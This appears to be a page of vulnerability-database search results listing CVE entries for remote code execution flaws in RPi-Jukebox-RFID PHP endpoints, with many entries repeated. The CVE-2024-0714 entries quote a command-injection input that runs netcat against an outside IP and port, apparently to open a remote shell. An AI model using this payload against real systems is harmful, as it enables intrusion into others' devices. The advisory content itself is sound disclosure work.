262 matches found
CVE-2024-41364
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution RCE vulnerability via htdocs\trackEdit.php...
CVE-2024-41368
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution RCE vulnerability via htdocs\inc.setWlanIpMail.php...
CVE-2024-41366
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution RCE vulnerability via htdocs\userScripts.php...
CVE-2024-41364
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution RCE vulnerability via htdocs\trackEdit.php...
CVE-2024-41361
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution RCE vulnerability via htdocs\manageFilesFolders.php...
CVE-2024-41367
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution RCE vulnerability via htdocs\api\playlist\appendFileToPlaylist.php...
CVE-2024-41369
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution RCE vulnerability via htdocs\inc.setWifi.php...
CVE-2024-41368
CVE-2024-41368 affects RPi-Jukebox-RFID v2.7.0. The vulnerability is reported as a remote code execution (RCE) via the file path htdocs/inc.setWlanIpMail.php. Documented impact is high confidentiality, integrity, and availability (as per CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) with a netwo...
CVE-2024-41361
CVE-2024-41361 affects RPi-Jukebox-RFID version 2.7.0 and enables remote code execution via the endpoint at htdocs/manageFilesFolders.php. The vulnerability has a high/critical impact (CVSS 3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) as reported by NVD and related sources, with exploitatio...
CVE-2024-41364
CVE-2024-41364 affects RPi-Jukebox-RFID 2.7.0. The vulnerability enables remote code execution via htdocs\trackEdit.php (network attack, no authentication, no user interaction). CVSS v3.1 metrics indicate a critical impact (C/H/I/A = High) with network access and low attack complexity. Exploitati...
CVE-2024-41366
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution RCE vulnerability via htdocs\userScripts.php...
CVE-2024-41361
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution RCE vulnerability via htdocs\manageFilesFolders.php...
CVE-2024-41369
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution RCE vulnerability via htdocs\inc.setWifi.php...
CVE-2024-41368
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution RCE vulnerability via htdocs\inc.setWlanIpMail.php...
CVE-2024-41364
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution RCE vulnerability via htdocs\trackEdit.php...
CVE-2024-41369
CVE-2024-41369 affects RPi-Jukebox-RFID v2.7.0, with a remote code execution (RCE) vulnerability exploitable via htdocs\inc.setWifi.php. Connected sources (NVD/Red Hat/CVE records) confirm the RCE via that PHP file, highlighting high impact (C/H/I/A) and network attack vector, with no exploitatio...
CVE-2024-41367
CVE-2024-41367 affects RPi-Jukebox-RFID v2.7.0, with a remote code execution (RCE) vulnerability exploitable via the file path htdocs\api\playlist\appendFileToPlaylist.php. The advisory documents an RCE impact (confidentiality, integrity, and availability listed as High) and notes a network-only ...
CVE-2024-41369
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution RCE vulnerability via htdocs\inc.setWifi.php...
CVE-2024-0714
A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 ...
Command injection
A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 ...